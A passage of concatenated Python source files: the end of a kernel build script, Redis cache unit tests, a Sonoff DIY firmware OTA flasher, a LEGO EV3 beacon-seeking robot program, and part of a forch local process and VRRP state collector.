            # else is treated as a make target.
            if re.match(r'^-{1,2}\w', c):
                cmd_line.append(c)
            else:
                build_targets.append(c)
        for t in build_targets:
            steps.append(ExecStep(cmd_line + [t], env=self.make_env))
        return steps
def scan_configs():
    """Get the full list of defconfigs appropriate for this tree."""
    builders = []
    for defconfig in glob.glob('arch/arm*/configs/vendor/*_defconfig'):
        # Strip the trailing '_defconfig' to get the bare target name.
        base = os.path.basename(defconfig)[:-10]
        suffix = "-llvm-64" if 'arch/arm64' in defconfig else "-llvm"
        builders.append(Builder(base + suffix, defconfig))
    return builders
def build_many(targets):
    """Build every Builder in *targets* with bounded parallelism."""
    print "Building %d target(s)" % len(targets)

    # To try and make up for the link phase being serial, try to do
    # two full builds in parallel.  Don't do too many because lots of
    # parallel builds tends to use up available memory rather quickly.
    parallel = 2
    if all_options.jobs and all_options.jobs > 1:
        # Split the requested make jobs across the parallel builds (min 2 each).
        j = max(all_options.jobs / parallel, 2)
        make_command.append("-j" + str(j))

    tracker = BuildTracker(parallel)
    for target in targets:
        steps = target.build()
        tracker.add_sequence(target.log_name, target.name, steps)
    tracker.run()
def main():
    """Parse the command line and build the requested kernel targets."""
    global make_command

    check_kernel()
    check_build()

    configs = scan_configs()

    usage = ("""
        %prog [options] all                 -- Build all targets
        %prog [options] target target ...   -- List specific targets
        """)
    parser = OptionParser(usage=usage, version=version)
    parser.add_option('--list', action='store_true',
            dest='list',
            help='List available targets')
    parser.add_option('-v', '--verbose', action='store_true',
            dest='verbose',
            help='Output to stdout in addition to log file')
    parser.add_option('-j', '--jobs', type='int', dest="jobs",
            help="Number of simultaneous jobs")
    parser.add_option('-l', '--load-average', type='int',
            dest='load_average',
            help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
    parser.add_option('-k', '--keep-going', action='store_true',
            dest='keep_going', default=False,
            help="Keep building other targets if a target fails")
    parser.add_option('-m', '--make-target', action='append',
            help='Build the indicated make target (default: %s)' %
            ' '.join(make_command))
    (options, args) = parser.parse_args()
    # Publish the parsed options for the rest of the module to read.
    global all_options
    all_options = options

    if options.list:
        print "Available targets:"
        for target in configs:
            print "   %s" % target.name
        sys.exit(0)

    if options.make_target:
        # Replace, not extend, the default target list.
        make_command = options.make_target

    if args == ['all']:
        build_many(configs)
    elif len(args) > 0:
        # Map names to builders so unknown targets can be reported precisely.
        all_configs = {}
        for t in configs:
            all_configs[t.name] = t
        targets = []
        for t in args:
            if t not in all_configs:
                parser.error("Target '%s' not one of %s" % (t, all_configs.keys()))
            targets.append(all_configs[t])
        build_many(targets)
    else:
        parser.error("Must specify a target to build, or 'all'")

if __name__ == "__main__":
    main()
|
test_rediscache.py | #!/usr/bin/env python3
"""
This will test various scenario with the redis cache.
It requires the local redis server to be started:
sudo service redis.server start
Start with unittest
python -m unittest test_rediscache.py
Start with pytest
pytest -s
Start with coverage
coverage run --source=rediscache --module pytest
coverage report --show-missing
"""
from datetime import datetime
from logging import info, INFO, basicConfig
from threading import Thread
from time import sleep
from unittest import TestCase, main
from redis import StrictRedis
from rediscache import RedisCache
# pylint: disable=missing-class-docstring, missing-function-docstring
class TestRedisCache(TestCase):
    """Functional tests for RedisCache.

    NOTE(review): these tests require a reachable local Redis server; setUp
    flushes the entire current database. Many tests rely on sleep() timing
    relative to the (refresh, expire) arguments of the cache decorators.
    """

    def __init__(self, method_name: str):
        # Direct Redis connection used to inspect keys and call counters.
        self.server = StrictRedis(decode_responses=True)
        super().__init__(method_name)

    def setUp(self):
        # Start every test from an empty database.
        retour = self.server.flushdb()
        info("Redis database flushed: %s", retour)

    def test_key_in_redis(self):
        """
        Cache keys encode the function name and its call arguments.

        This can be tested alone with:
        pytest -k test_key_in_redis
        """
        rediscache = RedisCache()
        @rediscache.cache(10, 20, wait=True)
        def func_with_args(arg):
            return arg
        @rediscache.cache(10, 20, wait=True)
        def func_with_args_kwargs(arg, kwarg=''):
            return str(arg) + str(kwarg)
        func_with_args("tata")
        func_with_args_kwargs("toto", kwarg="titi")
        keys = self.server.keys("*")
        self.assertIn("func_with_args(tata)", keys)
        self.assertIn("func_with_args_kwargs(toto,kwarg='titi')", keys)

    def test_normal_cache(self):
        # Non-waiting cache: first call returns '' while the value is computed
        # in a background thread; later calls read from the cache.
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2)
        def my_slow_hello(name: str) -> str:
            self.server.incr('my_slow_hello')  # count actual invocations
            sleep(0.3)
            return f"Hello {name}!"
        # Ask value to go in cache
        name = 'toto'
        hello = my_slow_hello(name)
        # Make sure the Thread was started
        sleep(0.1)
        # The function was called
        self.assertEqual(self.server.get('my_slow_hello'), '1')
        # But we do not have the result yet?
        self.assertEqual(hello, '')
        # Make sure the value is in the cache
        sleep(0.5)
        # Get value from cache
        hello = my_slow_hello(name)
        self.assertEqual(hello, f"Hello {name}!")
        # Still the function has only been called once
        self.assertEqual(self.server.get('my_slow_hello'), '1')

    def test_refresh(self):
        # A stale-but-not-expired value is served while a refresh runs.
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2)
        def my_slow_hello(name: str) -> str:
            """
            A slow function to test the Redis cache.
            Each call will get a different result.
            """
            sleep(0.2)
            return f"Hello {name}! {datetime.utcnow()}"
        # Ask value to go in cache
        hello = my_slow_hello('tata')
        # Make sure we have not got it yet
        self.assertEqual(hello, '')
        # Wait for it to arrive in cache
        sleep(0.5)
        # Retrieve value from cache
        hello1 = my_slow_hello('tata')
        # Wait for expiration of value
        sleep(1)
        # Retrieve value from cache again. Should be the same. But an update is on-going.
        hello2 = my_slow_hello('tata')
        self.assertEqual(hello1, hello2)
        # Wait for cache to be updated
        sleep(0.5)
        # Retrieve value from cache again. This time it was updated.
        hello3 = my_slow_hello('tata')
        self.assertNotEqual(hello2, hello3)

    def test_default(self):
        default = 'Default'
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2, default=default)
        def my_fast_hello(name: str) -> str:
            return f"Hello {name}!"
        # First time storing value in cache
        hello = my_fast_hello('fifi')
        # Value is default the first time
        self.assertEqual(hello, default)

    def test_fail(self):
        # A raising function never populates the cache; default keeps coming back.
        default = 'Default'
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2, default=default)
        def my_failling_hello(name: str) -> str:
            if not name:
                raise ValueError('Invalid name')
            return f"Hello {name}!"
        # Store value in the cache
        hello = my_failling_hello('')
        # Make sure we have not got it yet
        self.assertEqual(hello, default)
        # Wait for value to be in the cache
        sleep(1.1)
        # Do we get a value from the cache?
        hello = my_failling_hello('')
        # Only the default value is in the cache because the function failed
        self.assertEqual(hello, default)

    def test_expire(self):
        default = 'Default'
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2, default=default)
        def my_fast_hello(name: str) -> str:
            return f"Hello {name}!"
        # Store value in the cache
        hello = my_fast_hello('loulou')
        # Make sure we have not got it yet
        self.assertEqual(hello, default)
        # Wait for the value to be totally expired in the cache
        sleep(3)
        # Let's try and get the value from the cache
        hello = my_fast_hello('loulou')
        # The value is not in the cache anymore
        self.assertEqual(hello, default)

    def test_empty(self):
        default = 'Default'
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 2, default=default)
        def my_empty_hello(name: str) -> str:
            if name:
                return f"Hello {name}!"
            return ""
        # Store value in the cache
        hello = my_empty_hello('')
        # Make sure we have not got it yet
        self.assertEqual(hello, default)
        # Wait for the value to be stored in the cache
        sleep(0.5)
        # Let's try and get the value from the cache
        hello = my_empty_hello('')
        # We also store empty strings in the cache
        self.assertEqual(hello, '')

    def test_no_cache(self):
        # With enabled=False the decorator is a pass-through: direct call.
        rediscache = RedisCache(enabled=False)
        @rediscache.cache_raw(1, 2)
        def my_slow_hello(name: str) -> str:
            sleep(0.5)
            return f"Hello {name}!"
        # Get the value directly, no cache
        name = 'choux'
        hello = my_slow_hello(name)
        # We have the value after the first call
        self.assertEqual(hello, f"Hello {name}!")

    def test_no_cache_dumps(self):
        # Same pass-through behaviour for the JSON variant.
        rediscache = RedisCache(enabled=False)
        @rediscache.cache_json(1, 2)
        def my_slow_hello(name: str) -> str:
            sleep(0.5)
            return f"Hello {name}!"
        # Get the value directly, no cache
        name = 'choux'
        hello = my_slow_hello(name)
        # We have the value after the first call
        self.assertEqual(hello, f'Hello {name}!')

    def test_very_long(self):
        # If the function outlives `retry`, a second refresh is kicked off.
        rediscache = RedisCache()
        @rediscache.cache_raw(1, 10, retry=1)
        def my_very_slow_hello(name: str) -> str:
            # Count how many times the function was called
            self.server.incr('my_very_slow_hello')
            sleep(2)
            return f"Hello {name}!"
        # Stores the value in the cache
        my_very_slow_hello('hiboux')
        # Wait after the retry
        sleep(1.5)
        # Do we have it now?
        hello = my_very_slow_hello('hiboux')
        # No, we should not
        self.assertEqual(hello, '')
        # Let's see how many times the function was actually called
        sleep(0.1)
        self.assertEqual(self.server.get('my_very_slow_hello'), '2')

    def test_dict(self):
        # JSON cache round-trips dict values.
        rediscache = RedisCache()
        @rediscache.cache_json(1, 2)
        def return_dict(name: str):
            return {"hello": name}
        # Stores the value in the cache
        return_dict('you')
        # Make sure it is in the cache
        sleep(0.1)
        # Get the value from the cache
        hello = return_dict('you')
        self.assertEqual(hello, {'hello': 'you'})

    def test_dict_wait(self):
        rediscache = RedisCache()
        @rediscache.cache_json_wait(1, 2)
        def return_dict(name: str):
            sleep(0.1)
            return {"hello": name}
        # Stores the value in the cache and wait for the output
        hello = return_dict('me')
        self.assertEqual(hello, {'hello': 'me'})

    def test_wait(self):
        rediscache = RedisCache()
        @rediscache.cache_raw_wait(1, 2)
        def my_hello_wait(name: str) -> str:
            sleep(0.5)
            return f"hello {name}!"
        # Stores the value in the cache but wait for it as well
        name = 'chouchou'
        hello = my_hello_wait(name)
        self.assertEqual(hello, f"hello {name}!")

    def test_wait_thread(self):
        # Two concurrent waiters: the second should block on the in-flight
        # computation rather than recompute.
        rediscache = RedisCache()
        @rediscache.cache_raw_wait(1, 2)
        def my_hello_wait(name: str) -> str:
            sleep(0.5)
            return f"hello {name}!"
        name = 'bob'
        # Store the value in the cache and wait in another thread
        thread = Thread(target=my_hello_wait, args=(name,))
        thread.start()
        # Make sure the thread is started but not enough that it would be completed
        sleep(0.2)
        # Now we still wait for the value
        hello = my_hello_wait(name)
        self.assertEqual(hello, f"hello {name}!")

    def test_no_decode(self):
        # decode=False keeps raw bytes intact through the cache.
        my_byte_string = b'This is a byte string'
        rediscache = RedisCache(decode=False)
        @rediscache.cache_raw_wait(1, 2)
        def my_bytes() -> bytes:
            sleep(0.1)
            return my_byte_string
        # Store the value in the cache and wait
        value = my_bytes()
        self.assertEqual(value, my_byte_string)
        # Wait for the value to reach the cache
        sleep(0.2)
        # Get the same value from the cache
        value = my_bytes()
        self.assertEqual(value, my_byte_string)

    def test_decorator(self):
        # The decorator must preserve the wrapped function's metadata.
        rediscache = RedisCache()
        @rediscache.cache(1, 2)
        def my_cached_hello(name: str) -> str:
            """This is my documentation"""
            sleep(0.1)
            return f"Hello {name}!"
        self.assertEqual(my_cached_hello.__name__, "my_cached_hello")
        self.assertEqual(my_cached_hello.__doc__, "This is my documentation")

    # This test should run first, so it needs the be the first alphabetically.
    def test_1_get_stats(self):
        rediscache = RedisCache()
        @rediscache.cache_raw_wait(1, 2)
        def function1() -> str:
            sleep(0.1)
            return "Hello function 1"
        @rediscache.cache(1, 2)
        def function2() -> str:
            sleep(0.1)
            return "Hello function 2"
        function1()
        function2()
        stats = rediscache.get_stats()
        self.assertEqual(stats["Refresh"], 2)
        self.assertEqual(stats["Wait"], 1)
        self.assertEqual(stats["Failed"], 0)
        self.assertEqual(stats["Missed"], 2)
        self.assertEqual(stats["Success"], 0)
        self.assertEqual(stats["Default"], 1)
        function1()
        function2()
        stats = rediscache.get_stats()
        self.assertEqual(stats["Refresh"], 2)
        self.assertEqual(stats["Wait"], 1)
        self.assertEqual(stats["Failed"], 0)
        self.assertEqual(stats["Missed"], 3)
        self.assertEqual(stats["Success"], 1)
        self.assertEqual(stats["Default"], 2)
        sleep(0.2)
        function1()
        function2()
        # delete=True resets all counters after reading them.
        stats = rediscache.get_stats(delete=True)
        self.assertEqual(stats["Refresh"], 2)
        self.assertEqual(stats["Wait"], 1)
        self.assertEqual(stats["Failed"], 0)
        self.assertEqual(stats["Missed"], 3)
        self.assertEqual(stats["Success"], 3)
        self.assertEqual(stats["Default"], 2)
        stats = rediscache.get_stats()
        self.assertEqual(stats["Refresh"], 0)
        self.assertEqual(stats["Wait"], 0)
        self.assertEqual(stats["Failed"], 0)
        self.assertEqual(stats["Missed"], 0)
        self.assertEqual(stats["Success"], 0)
        self.assertEqual(stats["Default"], 0)
if __name__ == "__main__":
    # Configure logging so setUp's flush message is visible, then run the suite.
    basicConfig(level=INFO)
    main()
|
main.py | from zeroconf import ServiceBrowser, Zeroconf, IPVersion
from simple_term_menu import TerminalMenu
import os
import time
import hashlib
import multiprocessing
import requests
import socket
import server
DEVEL = False
class ZeroconfListener():
    """
    Listener definition used by Zeroconf.
    Collects all discovered devices into the discovered list.
    """

    def __init__(self):
        # Each entry is an (id, ipv4-address, port) tuple.
        self.discovered = []

    def remove_service(self, zeroconf, type, name):
        print("Service %s removed" % (name,))
        print('\n')

    def add_service(self, zeroconf, type, name):
        info = zeroconf.get_service_info(type, name)
        if not info:
            return
        device_id = info.properties["id".encode()].decode()
        address = info.parsed_addresses(IPVersion.V4Only)[0]
        port = info.port
        print("discovered {} {} {}".format(device_id, address, port))
        self.discovered.append((device_id, address, port))
def get_ip():
    """Get the ip of the host computer"""
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # UDP connect() sends no packets; it only selects the outgoing
        # interface, whose address we then read back.
        probe.connect(('1.1.1.1', 1))
        return probe.getsockname()[0]
    except Exception:
        return '127.0.0.1'
    finally:
        probe.close()
def main():
    """
    1. Identify all sonoff diy devices and select one to upload the
    firmware
    2. Enter the filepath of the new firmware
    3. HTTP server starts, serving the firmware's directory. This exposes
    that specific directory over the lan!
    4. Send a POST request to the device to unlock OTA
    5. Send a POST request to the device to get the new firmware,
    served from the HTTP server
    6. Wait for 10 minutes(hardcoded) to finish the file transmission.
    If the Sonoff device has rebooted, feel free to kill the process
    with Ctrl+C. As long as data are transfered to the sonoff device
    you will see the requests made to the HTTP server.

    Good luck
    """
    zeroconf = Zeroconf()
    print("Browsing sonoff devices...\n\n")
    listener = ZeroconfListener()
    # The browser discovers in the background; discoveries land in listener.discovered.
    browser = ServiceBrowser(zeroconf, "_ewelink._tcp.local.", listener, delay=1000)
    try:
        input("Press enter to stop discovering...\n\n")
    finally:
        zeroconf.close()
    discovered = listener.discovered
    if not discovered and not DEVEL:
        raise Exception("Nothing is discovered...")
    if DEVEL and not discovered:
        # Hard-coded test device used when DEVEL mode is on.
        discovered.append(("1000b8df0d", "192.168.20.187", "8081"))
    print("Totaly {} devices were discovered...\n".format(len(discovered)))
    print("Select from the list:\n")
    options = ["{}: {} {}".format(d[0], d[1], d[2]) for d in discovered]
    terminal_menu = TerminalMenu(options)
    i = terminal_menu.show()
    id_ = discovered[i][0]
    ip = discovered[i][1]
    port = discovered[i][2]
    print("Selected device: {} with ip: {}\n".format(id_, ip))
    firmware = input("Enter the filepath of the firmware:\n")
    if not os.path.isfile(firmware):
        raise Exception("{} is not a file".format(firmware))
    # Size limit of the sonoff DIY OTA partition.
    if os.stat(firmware).st_size > 508000:
        raise Exception("{} is larger than 508KB.".format(firmware))
    directory = os.path.dirname(firmware)
    # Start http file server (separate process serving the firmware directory)
    print("Starting HTTP server...")
    p = multiprocessing.Process(target=server.main, args=(directory,))
    p.start()
    try:
        # Check if OTA is unlocked
        url = "http://{}:{}/zeroconf/info".format(ip, port)
        data = {"deviceid": '',
                "data": {}}
        ret = requests.post(url, json=data)
        if not ret.json()["data"]["otaUnlock"]:
            # Unlock OTA
            print("Unlock OTA...")
            url = "http://{}:{}/zeroconf/ota_unlock".format(ip, port)
            data = {"deviceid": id_,
                    "data": {}}
            ret = requests.post(url, json=data)
            print(ret.status_code)
            if ret.status_code == 200:
                print("Done")
        else:
            print("OTA is unlocked.")
        # Give the device time to settle after unlocking.
        time.sleep(15)
        # Upload new firmware: tell the device where to download it from
        # and the expected sha256 so it can verify the image.
        print("Flash OTA...")
        url = "http://{}:{}/zeroconf/ota_flash".format(ip, port)
        sha256 = hashlib.sha256(open(firmware, "rb").read()).hexdigest()
        download_url = "http://{}:{}/{}".format(get_ip(), server.PORT, os.path.basename(firmware))
        data = {"deviceid": id_,
                "data": {"downloadUrl": download_url,
                         "sha256sum": sha256}}
        ret = requests.post(url, json=data)
        print(ret)
        print()
        print("Wait for 10 minutes...")
        print("If the firmware is updated and a tasmota wifi network appears, stop the process with Ctl+C")
        time.sleep(600)
    finally:
        # Always shut the HTTP server process down.
        p.terminate()

if __name__ == '__main__':
    main()
|
main.py | #!/usr/bin/env python3
from ev3dev2.motor import MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D, SpeedPercent, MoveSteering
from ev3dev2.sound import Sound
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from time import sleep
import time, logging, threading
#---------- Documentação -------------#
# INPUT_1 - InfraredSensor
# INPUT_2 - TouchSensor
# INPUT_3
# INPUT_4 - ColorSensor
# OUTPUT_A
# OUTPUT_B - MoveTank (Motor Esquerdo)
# OUTPUT_C - MoveTank (Motor Direito)
# OUTPUT_D - MediumMotor (Motor de Tiro)
#-------------------------------------- AÇÕES ---------------------------------------#
# Pause (seconds) used by turnRightWorker between turns; reset each iteration.
sleep_time = 0.3
# Default polling interval in seconds (currently unreferenced in this file).
DEFAULT_SLEEP_TIMEOUT_IN_SEC = 0.05
# IR beacon channel used by the seeker (IR-SEEK) mode.
CANAL = 3
def oneShooter():
    """Fire one shot: spin the shooter motor on port D four rotations at 75% speed."""
    shooter = MediumMotor(OUTPUT_D)
    shooter.on_for_rotations(SpeedPercent(75), 4)
def walkSeconds(direction, velocity, seconds):
    """Drive the B/C tank pair for *seconds* with the given steering and speed."""
    drive = MoveSteering(OUTPUT_B, OUTPUT_C)
    drive.on_for_seconds(direction, SpeedPercent(velocity), seconds)
def walkRotations(direction, velocity, rotations):
    """Drive the B/C tank pair for *rotations* wheel turns with the given steering/speed."""
    drive = MoveSteering(OUTPUT_B, OUTPUT_C)
    drive.on_for_rotations(direction, SpeedPercent(velocity), rotations)
#-------------------------------------- MÉTODOS DE MOVIMENTO ---------------------------------------#
def walkOnly():
    """Drive straight ahead at half speed for five seconds."""
    walkSeconds(0, 50, 5)
def walkRight():
    """Curve gently (steering -20) for two wheel rotations at half speed."""
    walkRotations(-20, 50, 2)
def turnRight():
    """Spin in place to the right (full steering) for one second."""
    walkSeconds(100, 50, 1)
def turnLeft():
    """Spin in place to the left (full negative steering) for one wheel rotation."""
    walkRotations(-100, 50, 1)
def walkLeft():
    """Curve gently (steering +20) for two wheel rotations at half speed."""
    walkRotations(20, 50, 2)
def walkBack():
    """Spin with full negative steering for three rotations.

    NOTE(review): despite the name this performs a turn, not a reverse drive —
    confirm intended behavior with the author.
    """
    walkRotations(-100, 50, 3)
#-------------------------------------- WORKERS ---------------------------------------#
def proxDetectWorker():
    """Obstacle-avoidance worker: poll the IR proximity sensor and dodge right.

    Runs until another thread sets the module-global ``stopProxSensor`` flag.
    When an obstacle is closer than 5 units, it pauses the drive worker via
    ``stopMotorSensor``, turns right, then restarts a fresh ``onlyWalkWorker``
    thread.
    """
    global stopMotorSensor
    global stopProxSensor
    global stopInfraredSensor
    global infrared_sensor
    # NOTE(review): `shots` is assigned but never used — possibly leftover.
    shots=3
    infrared_sensor.mode = 'IR-PROX'
    while True:
        if(stopProxSensor):
            break
        distance = infrared_sensor.value()
        if distance < 5:
            # Halt the walking worker, clear the obstacle, then resume.
            stopMotorSensor=True
            time.sleep(0.5)
            turnRight()
            stopMotorSensor=False
            # NOTE(review): a new walker thread is spawned on every dodge;
            # confirm the previous one has exited (it breaks on stopMotorSensor).
            t2 = threading.Thread(target=onlyWalkWorker)
            t2.start()
def turnRightWorker():
    """Endlessly turn right, pausing ``sleep_time`` seconds between turns.

    ``sleep_time`` is a module global that other code may raise temporarily;
    it is reset to 0.3 after every pause. This loop has no exit condition.
    """
    global sleep_time
    while True:
        turnRight()
        print(sleep_time)
        time.sleep(sleep_time)
        sleep_time=0.3
def patrulha():
    """Patrol loop: seek the IR beacon on channel CANAL, steer toward it,
    and shoot when roughly centered and close.

    Fixes over the original:
    - the local turn-duration variable no longer shadows the imported
      ``time`` module;
    - ``is not None`` instead of ``!= None``;
    - the mirrored left/right branches are merged (same math, signed
      direction), preserving the original behavior exactly.
    """
    global infrared_sensor
    infrared_sensor.mode = 'IR-SEEK'
    while True:
        dis = infrared_sensor.heading_and_distance(CANAL)
        if dis[0] is not None and dis[1] is not None:
            # Map heading magnitude to a turn duration in seconds.
            turn_time = abs(dis[0]) * 2.2 / 100.0
            # Negative heading -> beacon is to the left -> steer -100.
            direction = -100 if dis[0] < 0 else 100
            if turn_time == 0:
                # Heading exactly 0: nudge with a fixed 0.75 s turn
                # (matches the original's behavior, including the
                # follow-up zero-duration call).
                walkSeconds(direction, 100, 0.75)
            walkSeconds(direction, 100, turn_time)
            # Re-read the beacon after turning; shoot only when centered
            # (|heading| < 2) and near (distance < 60).
            dis = infrared_sensor.heading_and_distance(CANAL)
            if (dis[0] is not None and dis[1] is not None
                    and -2 < dis[0] < 2 and dis[1] < 60):
                oneShooter()
        else:
            # No beacon visible: sweep right and keep searching.
            walkSeconds(100, 50, 1)
def onlyWalkWorker():
    """Drive straight repeatedly until another thread raises ``stopMotorSensor``."""
    global stopInfraredSensor
    global stopMotorSensor
    while not stopMotorSensor:
        walkOnly()
# movimentação com paradas
# movimentação com paradas -> drive in short bursts with pauses
def onlyWalkWithStopWorker():
    """Alternate short pauses and two-rotation dashes until ``stopMotorSensor`` is set."""
    global stopInfraredSensor
    global stopMotorSensor
    while not stopMotorSensor:
        time.sleep(0.2)
        walkRotations(0, 100, 2)
        time.sleep(0.2)
#-------------------------------------- MAIN ---------------------------------------#
ts = TouchSensor(INPUT_2)
# Print a 15-line banner so the program start is obvious on the EV3 console.
for _ in range(15):
    print("#################################")
# Hold here until the touch sensor on port 2 is pressed.
while not ts.is_pressed:
    time.sleep(0.2)
def main():
    """Entry point: initialise sensors and state flags, dash forward, then patrol forever."""
    global stopInfraredSensor
    global stopMotorSensor
    global stopGiraSensor
    global infrared_sensor

    infrared_sensor = InfraredSensor(INPUT_1)
    stopInfraredSensor = False
    stopMotorSensor = False
    stopGiraSensor = False

    # Initial dash forward before entering the patrol loop.
    walkSeconds(0, 100, 4)
    # patrulha() never returns.
    patrulha()
# Run the robot. The original called main() twice; since main() enters an
# infinite patrol loop, the second call was unreachable and has been removed.
main()
|
local_state_collector.py | """Collecting the states of the local system"""
import copy
from datetime import datetime
import os
import re
import signal
import threading
import time
import psutil
from forch.proto.process_state_pb2 import ProcessState, VrrpState
from forch.proto.shared_constants_pb2 import State
from forch.proto.system_state_pb2 import StateSummary
from forch.utils import dict_proto, get_logger
# Default keepalived PID file location; overridable via KEEPALIVED_PID_FILE env.
_DEFAULT_KEEPALIVED_PID_FILE = '/var/run/keepalived.pid'
# psutil attributes prefetched for every scanned process (available as proc.info).
_PROC_ATTRS = ['cmdline', 'cpu_times', 'cpu_percent', 'memory_info']
# VRRP state strings as reported by keepalived; VRRP_ERROR is our own sentinel.
VRRP_MASTER = 'MASTER'
VRRP_BACKUP = 'BACKUP'
VRRP_FAULT = 'FAULT'
VRRP_ERROR = 'ERROR'
class LocalStateCollector:
    """Storing local system states.

    Periodically scans configured processes (via psutil), VRRP/keepalived
    status, and established network connections, keeping the results as
    dicts that are exported as protobuf summaries on demand.
    """

    def __init__(self, config, cleanup_handler, active_state_handler, metrics):
        # Accumulated process-scan results; 'connections' is populated by
        # _check_connections, 'processes' by _check_process_info.
        self._process_state = {'connections': {}}
        self._vrrp_state = {}
        # Last error detail per target process, used to de-duplicate logs.
        self._last_error = {}
        # ISO timestamp of the current scan pass (set under the lock).
        self._current_time = None
        self._conn_state = None
        self._conn_state_count = 0
        self._metrics = metrics
        # Guards state dicts against concurrent access from the timer thread.
        self._lock = threading.Lock()
        self._target_procs = config.processes
        self._check_vrrp = config.check_vrrp
        self._keepalived_pid_file = os.getenv('KEEPALIVED_PID_FILE', _DEFAULT_KEEPALIVED_PID_FILE)
        self._connections = config.connections
        self._process_interval = config.scan_interval_sec or 60
        self._cleanup_handler = cleanup_handler
        self._active_state_handler = active_state_handler
        self._logger = get_logger('lstate')
        self._logger.info(
            'Scanning %s processes every %ds', len(self._target_procs), self._process_interval)

    def initialize(self):
        """Initialize LocalStateCollector.

        Without VRRP checking there is no master/backup election, so the
        node is immediately reported active; then the periodic scan starts.
        """
        if not self._check_vrrp:
            self._active_state_handler(State.active)
        self.start_process_loop()

    def get_process_summary(self):
        """Return a summary of process table as a StateSummary proto."""
        process_state = self.get_process_state()
        return dict_proto({
            'state': process_state.process_state,
            'detail': process_state.process_state_detail,
            'change_count': process_state.process_state_change_count,
            'last_update': process_state.process_state_last_update,
            'last_change': process_state.process_state_last_change
        }, StateSummary)

    def get_process_state(self):
        """Get the states of processes as a ProcessState proto (thread-safe)."""
        with self._lock:
            return dict_proto(self._process_state, ProcessState)

    def get_vrrp_summary(self):
        """Return a summary of VRRP states as a StateSummary proto.

        healthy when VRRP checking is disabled or the node is MASTER/BACKUP;
        initializing before the first scan; broken otherwise (FAULT/ERROR).
        """
        vrrp_state = self.get_vrrp_state()
        if not self._check_vrrp:
            summary_state = State.healthy
        elif not vrrp_state.vrrp_state:
            summary_state = State.initializing
        elif vrrp_state.vrrp_state == VRRP_MASTER or vrrp_state.vrrp_state == VRRP_BACKUP:
            summary_state = State.healthy
        else:
            summary_state = State.broken
        return dict_proto({
            'state': summary_state,
            'detail': vrrp_state.vrrp_state_detail,
            'change_count': vrrp_state.vrrp_state_change_count,
            'last_change': vrrp_state.vrrp_state_last_change
        }, StateSummary)

    def get_vrrp_state(self):
        """Get VRRP states as a VrrpState proto (thread-safe)."""
        with self._lock:
            return dict_proto(self._vrrp_state, VrrpState)

    def _check_process_info(self):
        """Check the raw information of processes.

        Rebuilds self._process_state['processes'] for every configured
        target, updates per-process metrics, and maintains the aggregate
        process_state (healthy/broken) with change counters.
        """
        process_map = {}
        procs = self._get_target_processes()
        broken = []

        # fill up process info
        for target_name in self._target_procs:
            state_map = process_map.setdefault(target_name, {})
            proc_list = procs.get(target_name, [])
            # Default expected instance count is 1 when not configured.
            target_count = self._target_procs[target_name].count or 1
            state, detail = self._extract_process_state(target_name, target_count, proc_list)
            state_map['detail'] = detail
            if state:
                state_map['state'] = State.healthy
                self._metrics.update_var('process_state', 1, labels=[target_name])
                state_map.update(state)
                # Clear the remembered error so a recurrence is logged again.
                self._last_error.pop(target_name, None)
            else:
                state_map['state'] = State.broken
                self._metrics.update_var('process_state', 0, labels=[target_name])
                # Only log when the error text changed, to avoid log spam.
                if detail != self._last_error.get(target_name):
                    self._logger.error(detail)
                    self._last_error[target_name] = detail
                broken.append(target_name)
            old_process_map = self._process_state.get('processes', {}).get(target_name, {})
            old_state = old_process_map.get('state', State.unknown)
            if state_map['state'] != old_state:
                self._logger.info(
                    'State of process %s changed from %s to %s',
                    target_name, State.State.Name(old_state), State.State.Name(state_map['state']))

        self._process_state['processes'] = process_map
        self._process_state['process_state_last_update'] = self._current_time

        # Aggregate state: broken if any target process is broken.
        old_state = self._process_state.get('process_state')
        state = State.broken if broken else State.healthy
        old_state_detail = self._process_state.get('process_state_detail')
        state_detail = 'Processes in broken state: ' + ', '.join(broken) if broken else ''
        if state != old_state or state_detail != old_state_detail:
            state_change_count = self._process_state.get('process_state_change_count', 0) + 1
            self._logger.info(
                'process_state #%d is %s: %s', state_change_count, State.State.Name(state),
                state_detail)
            self._process_state['process_state'] = state
            self._process_state['process_state_detail'] = state_detail
            self._process_state['process_state_change_count'] = state_change_count
            self._process_state['process_state_last_change'] = self._current_time

    def _get_target_processes(self):
        """Get target processes.

        Returns a dict mapping each configured target name to the list of
        psutil.Process objects whose command line matches its regex.
        """
        procs = {}
        for proc in psutil.process_iter(attrs=_PROC_ATTRS):
            cmd_line_str = ' '.join(proc.info['cmdline'])
            for target_process_name, target_process_cfg in self._target_procs.items():
                # setdefault ensures every target gets an entry, even empty.
                proc_list = procs.setdefault(target_process_name, [])
                if re.search(target_process_cfg.regex, cmd_line_str):
                    proc_list.append(proc)
        return procs

    def _extract_process_state(self, proc_name, proc_count, proc_list):
        """Fill process state for a single process.

        Returns (proc_map, detail): proc_map is None on error (wrong
        instance count or stats failure); detail carries the error text,
        a CPU-threshold warning, or None.
        """
        if len(proc_list) != proc_count:
            return None, f"Process {proc_name}: number of process ({len(proc_list)}) " \
                         f"does not match target count ({proc_count})"

        old_proc_map = self._process_state.get('processes', {}).get(proc_name, {})
        proc_map = {}

        cmd_line = ' '.join(proc_list[0].info['cmdline']) if len(proc_list) == 1 else 'multiple'
        proc_map['cmd_line'] = cmd_line

        # Use the newest create time across instances; a change implies a restart.
        create_time_max = max(proc.create_time() for proc in proc_list)
        create_time = datetime.fromtimestamp(create_time_max).isoformat()
        proc_map['create_time'] = create_time
        proc_map['create_time_last_update'] = self._current_time
        if create_time != old_proc_map.get('create_time'):
            change_count = old_proc_map.get('create_time_change_count', 0) + 1
            self._logger.info('create_time #%d for %s: %s', change_count, proc_name, create_time)
            proc_map['create_time_change_count'] = change_count
            proc_map['create_time_last_change'] = self._current_time

        try:
            self._aggregate_process_stats(proc_map, proc_list)
        except Exception as e:
